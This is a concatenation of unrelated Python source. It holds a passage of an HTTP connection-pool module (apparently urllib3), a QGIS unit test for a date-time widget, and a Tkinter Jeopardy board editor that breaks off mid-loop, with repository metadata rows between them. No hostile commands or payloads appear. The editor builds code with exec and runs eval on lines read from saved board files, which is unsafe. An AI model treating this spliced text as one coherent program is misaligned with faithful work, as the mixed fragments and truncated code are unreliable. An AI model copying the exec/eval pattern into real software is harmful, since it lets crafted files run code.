# httplib doesn't like it when we include brackets in ipv6 addresses
# Specifically, if we include brackets but also pass the port then
# httplib crazily doubles up the square brackets on the Host header.
# Instead, we need to make sure we never pass ``None`` as the port.
# However, for backward compatibility reasons we can't actually
# *assert* that.
self.host = host.strip('[]')
self.port = port
def __str__(self):
return '%s(host=%r, port=%r)' % (type(self).__name__,
self.host, self.port)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Return False to re-raise any potential exceptions
return False
def close(self):
"""
Close all pooled connections and disable the pool.
"""
pass
# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
_blocking_errnos = set([errno.EAGAIN, errno.EWOULDBLOCK])
class HTTPConnectionPool(ConnectionPool, RequestMethods):
"""
Thread-safe connection pool for one host.
:param host:
Host used for this HTTP Connection (e.g. "localhost"), passed into
:class:`httplib.HTTPConnection`.
:param port:
Port used for this HTTP Connection (None is equivalent to 80), passed
into :class:`httplib.HTTPConnection`.
:param strict:
Causes BadStatusLine to be raised if the status line can't be parsed
as a valid HTTP/1.0 or 1.1 status line, passed into
:class:`httplib.HTTPConnection`.
.. note::
Only works in Python 2. This parameter is ignored in Python 3.
:param timeout:
Socket timeout in seconds for each individual connection. This can
be a float or integer, which sets the timeout for the HTTP request,
or an instance of :class:`urllib3.util.Timeout` which gives you more
fine-grained control over request timeouts. After the constructor has
been parsed, this is always a `urllib3.util.Timeout` object.
:param maxsize:
Number of connections to save that can be reused. More than 1 is useful
in multithreaded situations. If ``block`` is set to False, more
connections will be created but they will not be saved once they've
been used.
:param block:
If set to True, no more than ``maxsize`` connections will be used at
a time. When no free connections are available, the call will block
until a connection has been released. This is a useful side effect for
particular multithreaded situations where one does not want to use more
than maxsize connections per host to prevent flooding.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param retries:
Retry configuration to use by default with requests in this pool.
:param _proxy:
Parsed proxy URL, should not be used directly, instead, see
:class:`urllib3.connectionpool.ProxyManager`"
:param _proxy_headers:
A dictionary with proxy headers, should not be used directly,
instead, see :class:`urllib3.connectionpool.ProxyManager`"
:param \**conn_kw:
Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`,
:class:`urllib3.connection.HTTPSConnection` instances.
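    A minimal usage sketch (the host name and path below are illustrative only)::
        >>> pool = HTTPConnectionPool('httpbin.org', maxsize=2, block=True)
        >>> response = pool.request('GET', '/get')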
"""
scheme = 'http'
ConnectionCls = HTTPConnection
ResponseCls = HTTPResponse
def __init__(self, host, port=None, strict=False,
timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1, block=False,
headers=None, retries=None,
_proxy=None, _proxy_headers=None,
**conn_kw):
ConnectionPool.__init__(self, host, port)
RequestMethods.__init__(self, headers)
self.strict = strict
if not isinstance(timeout, Timeout):
timeout = Timeout.from_float(timeout)
if retries is None:
retries = Retry.DEFAULT
self.timeout = timeout
self.retries = retries
self.pool = self.QueueCls(maxsize)
self.block = block
self.proxy = _proxy
self.proxy_headers = _proxy_headers or {}
# Fill the queue up so that doing get() on it will block properly
for _ in xrange(maxsize):
self.pool.put(None)
# These are mostly for testing and debugging purposes.
self.num_connections = 0
self.num_requests = 0
self.conn_kw = conn_kw
if self.proxy:
# Enable Nagle's algorithm for proxies, to avoid packet fragmentation.
# We cannot know if the user has added default socket options, so we cannot replace the
# list.
self.conn_kw.setdefault('socket_options', [])
def _new_conn(self):
"""
Return a fresh :class:`HTTPConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTP connection (%d): %s",
self.num_connections, self.host)
conn = self.ConnectionCls(host=self.host, port=self.port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return conn
def _get_conn(self, timeout=None):
"""
Get a connection. Will return a pooled connection if one is available.
If no connections are available and :prop:`.block` is ``False``, then a
fresh connection is returned.
:param timeout:
Seconds to wait before giving up and raising
:class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and
:prop:`.block` is ``True``.
"""
conn = None
try:
conn = self.pool.get(block=self.block, timeout=timeout)
except AttributeError: # self.pool is None
raise ClosedPoolError(self, "Pool is closed.")
except Empty:
if self.block:
raise EmptyPoolError(self,
"Pool reached maximum size and no more "
"connections are allowed.")
pass # Oh well, we'll create a new connection then
# If this is a persistent connection, check if it got disconnected
if conn and is_connection_dropped(conn):
log.info("Resetting dropped connection: %s", self.host)
conn.close()
if getattr(conn, 'auto_open', 1) == 0:
# This is a proxied connection that has been mutated by
# httplib._tunnel() and cannot be reused (since it would
# attempt to bypass the proxy)
conn = None
return conn or self._new_conn()
def _put_conn(self, conn):
"""
Put a connection back into the pool.
:param conn:
Connection object for the current host and port as returned by
:meth:`._new_conn` or :meth:`._get_conn`.
If the pool is already full, the connection is closed and discarded
because we exceeded maxsize. If connections are discarded frequently,
then maxsize should be increased.
If the pool is closed, then the connection will be closed and discarded.
"""
try:
self.pool.put(conn, block=False)
return # Everything is dandy, done.
except AttributeError:
# self.pool is None.
pass
except Full:
# This should never happen if self.block == True
log.warning(
"Connection pool is full, discarding connection: %s",
self.host)
# Connection never got put back into the pool, close it.
if conn:
conn.close()
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
pass
def _prepare_proxy(self, conn):
# Nothing to do for HTTP connections.
pass
def _get_timeout(self, timeout):
""" Helper that always returns a :class:`urllib3.util.Timeout` """
if timeout is _Default:
return self.timeout.clone()
if isinstance(timeout, Timeout):
return timeout.clone()
else:
# User passed us an int/float. This is for backwards compatibility,
# can be removed later
return Timeout.from_float(timeout)
def _raise_timeout(self, err, url, timeout_value):
"""Is the error actually a timeout? Will raise a ReadTimeout or pass"""
if isinstance(err, SocketTimeout):
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# See the above comment about EAGAIN in Python 3. In Python 2 we have
# to specifically catch it and throw the timeout error
if hasattr(err, 'errno') and err.errno in _blocking_errnos:
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# Catch possible read timeouts thrown as SSL errors. If not the
# case, rethrow the original. We need to do this because of:
# http://bugs.python.org/issue10272
if 'timed out' in str(err) or 'did not complete (read)' in str(err): # Python 2.6
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
def _make_request(self, conn, method, url, timeout=_Default, chunked=False,
**httplib_request_kw):
"""
Perform a request on a given urllib connection object taken from our
pool.
:param conn:
a connection from one of our connection pools
:param timeout:
Socket timeout in seconds for the request. This can be a
float or integer, which will set the same timeout value for
the socket connect and the socket read, or an instance of
:class:`urllib3.util.Timeout`, which gives you more fine-grained
control over your timeouts.
"""
self.num_requests += 1
timeout_obj = self._get_timeout(timeout)
timeout_obj.start_connect()
conn.timeout = timeout_obj.connect_timeout
# Trigger any extra validation we need to do.
try:
self._validate_conn(conn)
except (SocketTimeout, BaseSSLError) as e:
# Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout.
self._raise_timeout(err=e, url=url, timeout_value=conn.timeout)
raise
# conn.request() calls httplib.*.request, not the method in
# urllib3.request. It also calls makefile (recv) on the socket.
if chunked:
conn.request_chunked(method, url, **httplib_request_kw)
else:
conn.request(method, url, **httplib_request_kw)
# Reset the timeout for the recv() on the socket
read_timeout = timeout_obj.read_timeout
# App Engine doesn't have a sock attr
if getattr(conn, 'sock', None):
# In Python 3 socket.py will catch EAGAIN and return None when you
# try and read into the file pointer created by http.client, which
# instead raises a BadStatusLine exception. Instead of catching
# the exception and assuming all BadStatusLine exceptions are read
# timeouts, check for a zero timeout before making the request.
if read_timeout == 0:
raise ReadTimeoutError(
self, url, "Read timed out. (read timeout=%s)" % read_timeout)
if read_timeout is Timeout.DEFAULT_TIMEOUT:
conn.sock.settimeout(socket.getdefaulttimeout())
else: # None or a value
conn.sock.settimeout(read_timeout)
# Receive the response from the server
try:
try: # Python 2.7, use buffering of HTTP responses
httplib_response = conn.getresponse(buffering=True)
except TypeError: # Python 2.6 and older, Python 3
try:
httplib_response = conn.getresponse()
except Exception as e:
# Remove the TypeError from the exception chain in Python 3;
# otherwise it looks like a programming error was the cause.
six.raise_from(e, None)
except (SocketTimeout, BaseSSLError, SocketError) as e:
self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
raise
# AppEngine doesn't have a version attr.
http_version = getattr(conn, '_http_vsn_str', 'HTTP/?')
log.debug("\"%s %s %s\" %s %s", method, url, http_version,
httplib_response.status, httplib_response.length)
try:
assert_header_parsing(httplib_response.msg)
except HeaderParsingError as hpe: # Platform-specific: Python 3
log.warning(
'Failed to parse headers (url=%s): %s',
self._absolute_url(url), hpe, exc_info=True)
return httplib_response
def _absolute_url(self, path):
return Url(scheme=self.scheme, host=self.host, port=self.port, path=path).url
def close(self):
"""
Close all pooled connections and disable the pool.
"""
# Disable access to the pool
old_pool, self.pool = self.pool, None
try:
while True:
conn = old_pool.get(block=False)
if conn:
conn.close()
except Empty:
pass # Done.
def is_same_host(self, url):
"""
Check if the given ``url`` is a member of the same host as this
connection pool.
"""
if url.startswith('/'):
return True
# TODO: Add optional support for socket.gethostbyname checking.
scheme, host, port = get_host(url)
# Use explicit default port for comparison when none is given
if self.port and not port:
port = port_by_scheme.get(scheme)
elif not self.port and port == port_by_scheme.get(scheme):
port = None
return (scheme, host, port) == (self.scheme, self.host, self.port)
def urlopen(self, method, url, body=None, headers=None, retries=None,
redirect=True, assert_same_host=True, timeout=_Default,
pool_timeout=None, release_conn=None, chunked=False,
**response_kw):
"""
Get a connection from the pool and perform an HTTP request. This is the
lowest level call for making a request, so you'll need to specify all
the raw details.
.. note::
More commonly, it's appropriate to use a convenience method provided
by :class:`.RequestMethods`, such as :meth:`request`.
.. note::
`release_conn` will only behave as expected if
`preload_content=False` because we want to make
`preload_content=False` the default behaviour someday soon without
breaking backwards compatibility.
:param method:
HTTP request method (such as GET, POST, PUT, etc.)
:param body:
Data to send in the request body (useful for creating
POST requests, see HTTPConnectionPool.post_url for
more convenience).
:param headers:
Dictionary of custom headers to send, such as User-Agent,
If-None-Match, etc. If None, pool headers are used. If provided,
these headers completely replace any pool-specific headers.
:param retries:
Configure the number of retries to allow before raising a
:class:`~urllib3.exceptions.MaxRetryError` exception.
Pass ``None`` to retry until you receive a response. Pass a
:class:`~urllib3.util.retry.Retry` object for fine-grained control
over different types of retries.
Pass an integer number to retry connection errors that many times,
but no other types of errors. Pass zero to never retry.
If ``False``, then retries are disabled and any exception is raised
immediately. Also, instead of raising a MaxRetryError on redirects,
the redirect response will be returned.
:type retries: :class:`~urllib3.util.retry.Retry`, False, or an int.
:param redirect:
If True, automatically handle redirects (status codes 301, 302,
303, 307, 308). Each redirect counts as a retry. Disabling retries
will disable redirect, too.
:param assert_same_host:
If ``True``, will make sure that the host of the pool requests is
consistent else will raise HostChangedError. When False, you can
use the pool on an HTTP proxy and request foreign hosts.
:param timeout:
If specified, overrides the default timeout for this one
request. It may be a float (in seconds) or an instance of
:class:`urllib3.util.Timeout`.
:param pool_timeout:
If set and the pool is set to block=True, then this method will
block for ``pool_timeout`` seconds and raise EmptyPoolError if no
connection is available within the time period.
:param release_conn:
If False, then the urlopen call will not release the connection
back into the pool once a response is received (but will release if
you read the entire contents of the response such as when
`preload_content=True`). This is useful if you're not preloading
the response's content immediately. You will need to call
``r.release_conn()`` on the response ``r`` to return the connection
back into the pool. If None, it takes the value of
``response_kw.get('preload_content', True)``.
:param chunked:
If True, urllib3 will send the body using chunked transfer
encoding. Otherwise, urllib3 will send the body using the standard
content-length form. Defaults to False.
:param \**response_kw:
Additional parameters are passed to
:meth:`urllib3.response.HTTPResponse.from_httplib`
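        A minimal sketch of a low-level call (host, path and retry count are
        illustrative only)::
            >>> pool = HTTPConnectionPool('httpbin.org')
            >>> response = pool.urlopen('GET', '/get', retries=Retry(3),
            ...                         preload_content=False)
            >>> data = response.read()
            >>> response.release_conn()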
"""
if headers is None:
headers = self.headers
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect, default=self.retries)
if release_conn is None:
release_conn = response_kw.get('preload_content', True)
# Check host
if assert_same_host and not self.is_same_host(url):
raise HostChangedError(self, url, retries)
conn = None
# Track whether `conn` needs to be released before
# returning/raising/recursing. Update this variable if necessary, and
# leave `release_conn` constant throughout the function. That way, if
# the function recurses, the original value of `release_conn` will be
# passed down into the recursive call, and its value will be respected.
#
# See issue #651 [1] for details.
#
# [1] <https://github.com/shazow/urllib3/issues/651>
release_this_conn = release_conn
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
if self.scheme == 'http':
headers = headers.copy()
headers.update(self.proxy_headers)
# Must keep the exception bound to a separate variable or else Python 3
# complains about UnboundLocalError.
err = None
# Keep track of whether we cleanly exited the except block. This
# ensures we do proper cleanup in finally.
clean_exit = False
try:
# Request a connection from the queue.
timeout_obj = self._get_timeout(timeout)
conn = self._get_conn(timeout=pool_timeout)
conn.timeout = timeout_obj.connect_timeout
is_new_proxy_conn = self.proxy is not None and not getattr(conn, 'sock', None)
if is_new_proxy_conn:
self._prepare_proxy(conn)
# Make the request on the httplib connection object.
httplib_response = self._make_request(conn, method, url,
timeout=timeout_obj,
body=body, headers=headers,
chunked=chunked)
# If we're going to release the connection in ``finally:``, then
# the response doesn't need to know about the connection. Otherwise
# it will also try to release it and we'll have a double-release
# mess.
response_conn = conn if not release_conn else None
# Import httplib's response into our own wrapper object
response = self.ResponseCls.from_httplib(httplib_response,
pool=self,
connection=response_conn,
**response_kw)
# Everything went great!
clean_exit = True
except Empty:
# Timed out by queue.
raise EmptyPoolError(self, "No pool connections are available.")
except (BaseSSLError, CertificateError) as e:
# Close the connection. If a connection is reused on which there
# was a Certificate error, the next request will certainly raise
# another Certificate error.
clean_exit = False
raise SSLError(e)
except SSLError:
# Treat SSLError separately from BaseSSLError to preserve
# traceback.
clean_exit = False
raise
except (TimeoutError, HTTPException, SocketError, ProtocolError) as e:
            # Discard the connection for these exceptions. It will
            # be replaced during the next _get_conn() call.
clean_exit = False
if isinstance(e, (SocketError, NewConnectionError)) and self.proxy:
e = ProxyError('Cannot connect to proxy.', e)
elif isinstance(e, (SocketError, HTTPException)):
e = ProtocolError('Connection aborted.', e)
retries = retries.increment(method, url, error=e, _pool=self,
_stacktrace=sys.exc_info()[2])
retries.sleep()
# Keep track of the error for the retry warning.
err = e
finally:
if not clean_exit:
# We hit some kind of exception, handled or otherwise. We need
# to throw the connection away unless explicitly told not to.
# Close the connection, set the variable to None, and make sure
# we put the None back in the pool to avoid leaking it.
conn = conn and conn.close()
release_this_conn = True
if release_this_conn:
# Put the connection back to be reused. If the connection is
# expired then it will be None, which will get replaced with a
# fresh connection during _get_conn.
self._put_conn(conn)
if not conn:
# Try again
log.warning("Retrying (%r) after connection "
"broken by '%r': %s", retries, err, url)
return self.urlopen(method, url, body, headers, retries,
redirect, assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Handle redirect?
redirect_location = redirect and response.get_redirect_location()
if redirect_location:
if response.status == 303:
method = 'GET'
try:
retries = retries.increment(method, url, response=response, _pool=self)
except MaxRetryError:
if retries.raise_on_redirect:
# Release the connection for this response, since we're not
# returning it to be released manually.
response.release_conn()
raise
return response
log.info("Redirecting %s -> %s", url, redirect_location)
return self.urlopen(
method, redirect_location, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Check if we should retry the HTTP response.
if retries.is_forced_retry(method, status_code=response.status):
try:
retries = retries.increment(method, url, response=response, _pool=self)
except MaxRetryError:
if retries.raise_on_status:
# Release the connection for this response, since we're not
# returning it to be released manually.
response.release_conn()
raise
return response
retries.sleep()
log.info("Forced retry: %s", url)
return self.urlopen(
method, url, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
return response
class HTTPSConnectionPool(HTTPConnectionPool):
"""
Same as :class:`.HTTPConnectionPool`, but HTTPS.
When Python is compiled with the :mod:`ssl` module, then
:class:`.VerifiedHTTPSConnection` is used, which *can* verify certificates,
instead of :class:`.HTTPSConnection`.
:class:`.VerifiedHTTPSConnection` uses one of ``assert_fingerprint``,
``assert_hostname`` and ``host`` in this order to verify connections.
If ``assert_hostname`` is False, no verification is done.
The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs``,
``ca_cert_dir``, and ``ssl_version`` are only used if :mod:`ssl` is
available and are fed into :meth:`urllib3.util.ssl_wrap_socket` to upgrade
the connection socket into an SSL socket.
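    A minimal usage sketch (the host and certificate bundle path are
    illustrative only)::
        >>> pool = HTTPSConnectionPool('example.com', port=443,
        ...                            cert_reqs='CERT_REQUIRED',
        ...                            ca_certs='/path/to/ca_bundle.pem')
        >>> response = pool.request('GET', '/')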
"""
scheme = 'https'
ConnectionCls = HTTPSConnection
def __init__(self, host, port=None,
strict=False, timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1,
block=False, headers=None, retries=None,
_proxy=None, _proxy_headers=None,
key_file=None, cert_file=None, cert_reqs=None,
ca_certs=None, ssl_version=None,
assert_hostname=None, assert_fingerprint=None,
ca_cert_dir=None, **conn_kw):
HTTPConnectionPool.__init__(self, host, port, strict, timeout, maxsize,
block, headers, retries, _proxy, _proxy_headers,
**conn_kw)
if ca_certs and cert_reqs is None:
cert_reqs = 'CERT_REQUIRED'
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.ca_certs = ca_certs
self.ca_cert_dir = ca_cert_dir
self.ssl_version = ssl_version
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
def _prepare_conn(self, conn):
"""
Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket`
and establish the tunnel if proxy is used.
"""
if isinstance(conn, VerifiedHTTPSConnection):
conn.set_cert(key_file=self.key_file,
cert_file=self.cert_file,
cert_reqs=self.cert_reqs,
ca_certs=self.ca_certs,
ca_cert_dir=self.ca_cert_dir,
assert_hostname=self.assert_hostname,
assert_fingerprint=self.assert_fingerprint)
conn.ssl_version = self.ssl_version
return conn
def _prepare_proxy(self, conn):
"""
Establish tunnel connection early, because otherwise httplib
would improperly set Host: header to proxy's IP:port.
"""
# Python 2.7+
try:
set_tunnel = conn.set_tunnel
except AttributeError: # Platform-specific: Python 2.6
set_tunnel = conn._set_tunnel
if sys.version_info <= (2, 6, 4) and not self.proxy_headers: # Python 2.6.4 and older
set_tunnel(self.host, self.port)
else:
set_tunnel(self.host, self.port, self.proxy_headers)
conn.connect()
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPSConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTPS connection (%d): %s",
self.num_connections, self.host)
if not self.ConnectionCls or self.ConnectionCls is DummyConnection:
raise SSLError("Can't connect to HTTPS URL because the SSL "
"module is not available.")
actual_host = self.host
actual_port = self.port
if self.proxy is not None:
actual_host = self.proxy.host
actual_port = self.proxy.port
conn = self.ConnectionCls(host=actual_host, port=actual_port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return self._prepare_conn(conn)
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
super(HTTPSConnectionPool, self)._validate_conn(conn)
# Force connect early to allow us to validate the connection.
if not getattr(conn, 'sock', None): # AppEngine might not have `.sock`
conn.connect()
if not conn.is_verified:
warnings.warn((
'Unverified HTTPS request is being made. '
'Adding certificate verification is strongly advised. See: '
'https://urllib3.readthedocs.io/en/latest/security.html'),
InsecureRequestWarning)
def connection_from_url(url, **kw):
"""
Given a url, return an :class:`.ConnectionPool` instance of its host.
This is a shortcut for not having to parse out the scheme, host, and port
of the url before creating an :class:`.ConnectionPool` instance.
:param url:
Absolute URL string that must include the scheme. Port is optional.
:param \**kw:
Passes additional parameters to the constructor of the appropriate
:class:`.ConnectionPool`. Useful for specifying things like
timeout, maxsize, headers, etc.
Example::
>>> conn = connection_from_url('http://google.com/')
>>> r = conn.request('GET', '/')
"""
scheme, host, port = get_host(url)
port = port or port_by_scheme.get(scheme, 80)
if scheme == 'https':
return HTTPSConnectionPool(host, port=port, **kw)
else:
return HTTPConnectionPool(host, port=port, **kw)
| gpl-3.0 | 1,888,680,584,847,331,600 | 37.788684 | 99 | 0.595755 | false |
minorua/QGIS | tests/src/python/test_qgsdatetimeedit.py | 12 | 1643 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDateTimeEdit
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Denis Rouzaud'
__date__ = '2018-01-04'
__copyright__ = 'Copyright 2017, The QGIS Project'
import qgis # NOQA
from qgis.gui import QgsDateTimeEdit
from qgis.PyQt.QtCore import Qt, QDateTime
from qgis.testing import start_app, unittest
start_app()
DATE = QDateTime.fromString('2018-01-01 01:02:03', Qt.ISODate)
class TestQgsDateTimeEdit(unittest.TestCase):
def testSettersGetters(self):
""" test widget handling of null values """
w = qgis.gui.QgsDateTimeEdit()
w.setAllowNull(False)
w.setDateTime(DATE)
self.assertEqual(DATE, w.dateTime())
# date should remain when setting an invalid date
w.setDateTime(QDateTime())
self.assertEqual(DATE, w.dateTime())
def testNullValueHandling(self):
""" test widget handling of null values """
w = qgis.gui.QgsDateTimeEdit()
w.setAllowNull(True)
# date should be valid again when not allowing NULL values
w.setDateTime(QDateTime())
w.setAllowNull(False)
self.assertTrue(w.dateTime().isValid())
w.setAllowNull(True)
w.setDateTime(QDateTime())
self.assertFalse(w.dateTime().isValid())
w.setAllowNull(False)
self.assertTrue(w.dateTime().isValid())
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | -8,846,367,499,604,521,000 | 28.339286 | 78 | 0.667681 | false |
WolfgangAxel/ConGames | Python-Jeopardy/Editor.py | 1 | 18974 | #!/usr/bin/python
# -*- coding: iso-8859-1 -*-
import Tkinter,tkFont
import math
import glob
import os
class simpleapp_tk(Tkinter.Tk):
def __init__(self,parent):
Tkinter.Tk.__init__(self,parent)
self.parent = parent
self.initialize()
def initialize(self):
self.grid()
self.HOME = os.getcwd()
if not os.path.exists(self.HOME+'/.PythonJeopardy'):
os.mkdir(self.HOME+'/.PythonJeopardy')
if not os.path.exists(self.HOME+'/.PythonJeopardy/Default'):
f=open(self.HOME+'/.PythonJeopardy/Default','w')
ABP=[]
for i,cat in enumerate(["Category 1","Category 2","Category 3","Category 4","Category 5"]):
for ques in range(1,6):
exec('q="A question"')
exec('a="An Answer"')
exec('i=""')
exec('B'+str(ques)+'=[q,a,i]')
exec('C'+str(i)+'=[B1,B2,B3,B4,B5]')
exec('ABP.append(["'+cat+'",C'+str(i)+'])')
P=[100,200,300,400,500]
board = [ABP,P]
f.write(str(board)+'\n')
for i,item in enumerate(P):
P[i]=item*2
board = [ABP,P]
f.write(str(board)+'\n')
f.write("['A Category', 'A Question', 'An Answer', '']")
f.close()
self.ent=Tkinter.StringVar()
self.Font = tkFont.Font(family="system",size=12)
##############
self.menya = Tkinter.Menu(self)
self.menya.add_command(label="New", command=self.StartAnew)
self.menya.OpenMenu = Tkinter.Menu(self.menya,tearoff=0)
self.menya.savemen = Tkinter.Menu(self.menya,tearoff=0)
self.menya.savemen.board=Tkinter.Menu(self.menya,tearoff=0)
self.menya.savemen.board.add_command(label="Save to new file",command=self.RawSave)
self.menya.savemen.forread=Tkinter.Menu(self.menya,tearoff=0)
self.menya.savemen.forread.add_command(label="Save to new file",command=self.ReadSave)
for i,name in enumerate(glob.glob(self.HOME+'/.PythonJeopardy/*.board')):
if name:
exec('def Open'+str(i)+'():'+
'\n app.OpenFile ="'+name+'"'+
'\n app.Round=1'+
'\n app.fileName = app.OpenFile.replace(app.HOME+"/.PythonJeopardy/","")'+
'\n app.fileName = app.fileName.replace(".board","")'+
'\n app.arrayload()')
exec('self.menya.OpenMenu.add_command(label="'+name+'", command=Open'+str(i)+')')
exec('def Save'+str(i)+'():'+
'\n app.SaveFile ="'+name+'"'+
'\n app.RawSave()')
exec('self.menya.savemen.board.add_command(label="'+name+'", command=Save'+str(i)+')')
else:
                self.menya.OpenMenu.add_command(label="{None Found}")
for i,name in enumerate(glob.glob(self.HOME+'/.PythonJeopardy/*.txt')):
if name:
exec('def SaveR'+str(i)+'():'+
'\n app.SaveFile ="'+name+'"'+
'\n app.ReadSave()')
exec('self.menya.savemen.forread.add_command(label="'+name+'", command=SaveR'+str(i)+')')
self.menya.add_cascade(label="Open",menu=self.menya.OpenMenu)
self.menya.savemen.add_cascade(label="Save .board file", menu=self.menya.savemen.board)
self.menya.savemen.add_cascade(label="Export Readable .txt File", menu=self.menya.savemen.forread)
self.menya.Round = Tkinter.Menu(self.menya,tearoff=0)
for Round in [1,2,3]:
exec('self.menya.Round.add_command(label="Round '+str(Round)+'",command=self.loadround'+str(Round)+')')
self.menya.add_cascade(label="Save",menu=self.menya.savemen)
self.menya.add_cascade(label="Round",menu=self.menya.Round)
self.menya.add_command(label="Change Point Values", command=self.pointass)
self.menya.add_command(label="Auto Font Size",command=self.fontadj)
self.config(menu=self.menya)
##############
for RND in ["R1","R2"]:
exec('self.'+RND+'=Tkinter.Frame(self)')
for cat in range(0,5):
exec('self.'+RND+'.cat'+str(cat)+'=Tkinter.StringVar()')
exec('self.'+RND+'.catscroll'+str(cat)+'=Tkinter.Scrollbar(self.'+RND+')')
exec('self.'+RND+'.catlab'+str(cat)+' = Tkinter.Entry(self.'+RND+',textvariable=self.'+RND+'.cat'+str(cat)+',font=self.Font,width='+str(self.winfo_width()/5)+',xscrollcommand=self.'+RND+'.catscroll'+str(cat)+'.set)')
exec('self.'+RND+'.catscroll'+str(cat)+'.config(command=self.'+RND+'.catlab'+str(cat)+'.xview)')
exec('self.'+RND+'.catscroll'+str(cat)+'.grid()')
exec('self.'+RND+'.catlab'+str(cat)+'.grid(column='+str(cat)+',row=0,sticky="NSEW")')
for ques in range(1,6):
exec('self.'+RND+'.box'+str(cat)+'x'+str(ques)+' = Tkinter.Button(self.'+RND+',command=self.reveal'+str(cat)+'x'+str(ques)+',font=self.Font,width='+str(self.winfo_width()/5)+')')
exec('self.'+RND+'.box'+str(cat)+'x'+str(ques)+'.grid(column='+str(cat)+',row='+str(ques)+',sticky="NSEW")')
for i in range(0,6):
if i<5:
exec('self.'+RND+'.grid_columnconfigure('+str(i)+',weight=1)')
exec('self.'+RND+'.grid_rowconfigure('+str(i)+',weight=1)')
self.R3 = Tkinter.Frame(self)
##############
self.StartAnew()
self.grid_columnconfigure(0,weight=1)
self.grid_rowconfigure(0,weight=1)
self.resizable(True,True)
self.update()
self.geometry(self.geometry())
####################################################################
def savegame(self):
self.savename = Tkinter.Toplevel(self)
self.savename.wm_title("Enter a name to save the file as")
self.savename.entbox=Tkinter.Entry(self.savename,textvariable=self.ent)
self.savename.entbox.grid(column=0,row=0,sticky="NSEW")
self.savename.proceed=Tkinter.Button(self.savename,text="Save",command=self.arraysave)
self.savename.proceed.grid(column=1,row=0,sticky="NSEW")
def arrayload(self):
self.ent.set(self.fileName)
f=open(self.OpenFile,'r')
self.sepf = f.readlines()
for Round in [1,2]:
self.clusterfuck = {}
self.clusterfuck = eval(str(self.sepf[Round-1]))
self.P=eval(str(self.clusterfuck[1]))
for cat in range(0,5):
exec('self.R'+str(Round)+'.cat'+str(cat)+'.set("'+str(eval(str(eval(str(self.clusterfuck[0]))[cat]))[0])+'")')
for ques in range(1,6):
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+' = Tkinter.Frame(self)')
exec('self.R'+str(Round)+'.box'+str(cat)+'x'+str(ques)+'.config(text=eval(str(self.P['+str(ques-1)+'])))')
##################################
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile = Tkinter.StringVar()')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagecheck=Tkinter.Button(self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+',text="Add image",command=self.changerelief,font=self.Font)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagecheck.grid(row=1,column=2,sticky="NSEW")')
for i,name in enumerate(["question","answer","image"]):
if name == "image":
if eval('str(eval(str(eval(str(eval(str(eval(str(self.clusterfuck[0]))['+str(cat)+']))[1]))['+str(ques-1)+']))['+str(i)+'])'):
self.CAT,self.QUES,self.Round=cat,ques,Round
self.changerelief()
else:
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+' = Tkinter.StringVar()')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+'.set(str(eval(str(eval(str(eval(str(eval(str(self.clusterfuck[0]))['+str(cat)+']))[1]))['+str(ques-1)+']))['+str(i)+']))')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+'entry = Tkinter.Entry(self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+',textvariable=self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+',font=self.Font)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.'+name+'entry.grid(column='+str(i)+',row=0,sticky="NSEW")')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.RtB=Tkinter.Button(self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+',text="Return to board",command=self.returntoboard,font=self.Font)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.RtB.grid(row=2,column=0,columnspan=3,sticky="NSEW")')
for x in range(0,2):
